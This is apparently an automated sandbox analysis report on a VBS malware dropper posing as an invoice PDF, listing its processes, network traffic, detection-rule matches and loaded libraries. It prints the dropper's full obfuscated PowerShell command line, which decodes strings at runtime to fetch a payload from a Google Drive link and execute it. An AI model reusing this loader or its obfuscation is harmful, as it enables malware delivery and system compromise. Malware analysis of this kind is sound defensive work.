              Source: powershell.exe, 00000004.00000002.1401976050.000002A9C673D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.2197846460.000000000A63E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1374187996.000002A9B6B69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1374187996.000002A9B6B6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49683 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49693 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.7:49696 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.7:49697 version: TLS 1.2

              E-Banking Fraud

              Source: Yara match File source: 0000000F.00000002.2197846460.000000000A662000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

              System Summary

              Source: amsi64_6648.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_1232.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9AAFBFC24_2_00007FFB9AAFBFC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFB9AAFCD724_2_00007FFB9AAFCD72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456E6A813_2_0456E6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456EF7813_2_0456EF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0456E36013_2_0456E360
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6080
              Source: unknownProcess created: Commandline size = 6080
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6080Jump to behavior
              Source: amsi64_6648.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_1232.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1232, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@13/11@3/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Fugtservietter.Her
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-D3MSVR
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ir5mec2p.hzw.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6648
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1232
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs Virustotal: Detection: 26%
              Source: FAKTURA-P-4526485-2742747722-00043067#U00b7pdf.vbs ReversingLabs: Detection: 26%
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. 
Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (same obfuscated command line as the System32 powershell.exe launch above)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
              Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
              Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
